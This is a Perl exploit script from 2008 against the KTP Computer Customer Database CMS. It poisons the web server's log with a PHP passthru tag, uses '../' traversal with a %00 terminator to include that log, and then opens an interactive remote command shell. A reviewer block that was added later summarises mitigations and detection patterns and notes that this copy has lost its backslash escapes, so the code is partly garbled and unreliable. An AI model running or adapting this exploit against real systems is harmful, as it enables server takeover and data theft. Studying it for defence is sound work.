
ktpccd-lfi.txt

Posted on 01 December 2008

#!/usr/bin/perl -w
#======================================
# KTPCCD Local File Inclusion Exploit
#======================================
#
# ,--^----------,--------,-----,-------^--,
# | ||||||||| `--------' | O .. CWH Underground Hacking Team ..
# `+---------------------------^----------|
# `\_,-------, _________________________|
# / XXXXXX /`| /
# / XXXXXX / ` /
# / XXXXXX /\______(
# / XXXXXX /
# / XXXXXX /
# (________(
# `------'
#
#AUTHOR : CWH Underground
#DATE : 30 November 2008
#SITE : cwh.citec.us
#
#
#####################################################
#APPLICATION : KTP Computer Customer Database CMS
#VERSION : 1
#DOWNLOAD : http://downloads.sourceforge.net/ktpcomputercust/ktp_build_20081119.zip
######################################################
#Note: magic_quotes_gpc = off
#Vulnerability in Local File Inclusion
#Wrote Exploit for Local File Inclusion <-> Remote Command Execution
#######################################################################################
#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#######################################################################################
#
# ---------------------------------------------------------------------------
# Reviewer notes (defensive summary of what this script exercises)
#
# Vulnerability class: local file inclusion through the CMS's "p" query
# parameter. The script (1) sends a raw HTTP request whose request line
# carries a PHP tag, so that the web server records it verbatim in its
# access or error log, then (2) asks the CMS to include that log file by
# passing a "../"-style traversal path in "p", terminated with "%00"
# (presumably to cut off any suffix the application appends before the
# include). If the poisoned log is included and the tag is executed, the
# attacker-controlled "cmd" parameter is intended to reach passthru().
#
# Mitigation on the application side: never build an include path from
# request data; map "p" onto a fixed allow-list of page names and reject
# anything else. magic_quotes_gpc (the precondition named in the header)
# is not a security control and has since been removed from PHP; modern
# PHP also rejects NUL bytes in include paths, but neither replaces input
# validation. Denying the PHP process read access to the web server's log
# directory closes the log-poisoning step this script relies on.
#
# Detection: log entries whose request line contains "<?" or "passthru",
# and requests to the CMS whose "p" value contains "../" or "%00".
#
# Listing fidelity: this copy appears to have lost backslash escapes in
# extraction (e.g. `s/http:////g`, and print strings with no "\n"), so it
# is not a faithful reproduction of the original file and may not behave
# as the author intended. There is no `use strict`; every variable below
# that is not declared with `my` is a package global.
# ---------------------------------------------------------------------------

use LWP::UserAgent;
use IO::Socket;
use LWP::Simple;

# Log path the command loop falls back to when none of the probes below match.
$log="../";

# Candidate locations of the web server's access/error logs, prefixed with
# "../" traversal sequences of varying depth.
@apache=(
    "../../../../../var/log/httpd/access_log",
    "../../../../../var/log/httpd/error_log",
    "../apache/logs/error.log",
    "../apache/logs/access.log",
    "../../apache/logs/error.log",
    "../../apache/logs/access.log",
    "../../../apache/logs/error.log",
    "../../../apache/logs/access.log",
    "../../../../apache/logs/error.log",
    "../../../../apache/logs/access.log",
    "../../../../../apache/logs/error.log",
    "../../../../../apache/logs/access.log",
    "../logs/error.log",
    "../logs/access.log",
    "../../logs/error.log",
    "../../logs/access.log",
    "../../../logs/error.log",
    "../../../logs/access.log",
    "../../../../logs/error.log",
    "../../../../logs/access.log",
    "../../../../../logs/error.log",
    "../../../../../logs/access.log",
    "../../../../../etc/httpd/logs/access_log",
    "../../../../../etc/httpd/logs/access.log",
    "../../../../../etc/httpd/logs/error_log",
    "../../../../../etc/httpd/logs/error.log",
    "../../.. /../../var/www/logs/access_log",
    "../../../../../var/www/logs/access.log",
    "../../../../../usr/local/apache/logs/access_log",
    "../../../../../usr/local/apache/logs/access.log",
    "../../../../../var/log/apache/access_log",
    "../../../../../var/log/apache/access.log",
    "../../../../../var/log/access_log",
    "../../../../../var/www/logs/error_log",
    "../../../../../var/www/logs/error.log",
    "../../../../../usr/local/apache/logs/error_log",
    "../../../../../usr/local/apache/logs/error.log",
    "../../../../../var/log/apache/error_log",
    "../../../../../var/log/apache/error.log",
    "../../../../../var/log/access_log",
    "../../../../../var/log/error_log"
);

# Clear the terminal (platform-dependent) and print the banner.
my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }
print " ============================================== ";
print " KTP Computer Customer Database ";
print " Remote Command Execution Exploit ";
print " Discovered By CWH Underground ";
print "============================================== ";
print " ";
print " ,--^----------,--------,-----,-------^--, ";
print " | ||||||||| `--------' | O ";
print " `+---------------------------^----------| ";
print " `\_,-------, _________________________| ";
print " / XXXXXX /`| / ";
print " / XXXXXX / ` / ";
print " / XXXXXX /\______( ";
print " / XXXXXX / ";
print " / XXXXXX / .. CWH Underground Hacking Team .. ";
print " (________( ";
print " `------' ";
print " ";

# Usage text is printed when fewer than two arguments are given; note that
# execution continues past this block either way.
if (@ARGV < 2) { print "Usage: ./xpl.pl <Host> <Path> "; print "Ex. ./xpl.pl www.hackme.com /ktp "; }
$host=$ARGV[0];
$path=$ARGV[1];

# Strip a leading scheme from the host so it can be used as a socket peer.
if ( $host =~ /^http:/ ) {$host =~ s/http:////g;}
print " Trying to Inject the Code... ";

# Step 1 (log poisoning): a raw request is sent over a plain TCP socket so
# that the PHP tag in $CODE appears in the request line, which the server
# records in its access or error log.
$CODE="<? passthru($_GET[cmd]) ?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host. 
";
print $socket "GET /cwhunderground ".$CODE." HTTP/1.1 ";
print $socket "Host: ".$host." ";
print $socket "Connection: close ";
close($socket);

# Step 2 (inclusion probe): each candidate log path is requested through the
# "p" parameter with "%00" appended. The marker "cwhunderground" from the
# poisoned request line showing up in the response identifies which log the
# application actually included; that path is kept in $log.
if ( $host !~ /^http:/ ) {$host = "http://" . $host;}
foreach $getlog(@apache) {
    chomp($getlog);
    $find= $host.$path."/?p=".$getlog."%00";
    $xpl = LWP::UserAgent->new() or die "Could not initialize browser ";
    $req = HTTP::Request->new(GET => $find);
    $res = $xpl->request($req);
    $info = $res->content;
    if($info =~ /cwhunderground/) {print " Successfully injected in $getlog ";$log=$getlog;}
}

# Interactive loop: every line read from STDIN is sent as the "cmd" query
# parameter together with the log path in $log, and the response body is
# printed. The loop condition uses "exit" as a pattern, so any input that
# merely contains that substring ends the session.
my $sis="$^O";if ($sis eq 'MSWin32') { print " [cmd@win32]$ "; } else { print " [cmd@unix]$ "; }
chomp( $cmd = <STDIN> );
while($cmd !~ "exit") {
    $shell= $host.$path."/?p=".$log."%00&cmd=$cmd";
    $xpl = LWP::UserAgent->new() or die "Could not initialize browser ";
    $req = HTTP::Request->new(GET => $shell);
    $res = $xpl->request($req);
    $info = $res->content;
    print " $info";
    my $sis="$^O";if ($sis eq 'MSWin32') { print " [cmd@win32]$ "; } else { print " [cmd@unix]$ "; }
    chomp( $cmd = <STDIN> );
}

 
